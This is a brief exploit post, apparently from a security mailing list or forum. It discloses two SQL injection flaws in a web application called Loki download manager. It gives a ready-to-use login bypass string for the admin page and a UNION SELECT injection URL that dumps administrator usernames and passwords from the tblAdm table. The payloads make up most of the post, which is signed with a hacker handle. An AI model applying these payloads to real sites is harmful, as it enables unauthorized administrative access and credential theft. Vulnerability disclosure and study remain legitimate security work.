hi all tow SQL injection in Loki download manager 1. in http://localhost/adm/default.asp user: anyuser pass: 'or''=' 2. in http://localhost/downmancv/catinfo.asp?cat=' union select null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm ' and u will have user and pass h4ve F4n Salmanooh hack_912@xxxxxxxxxxx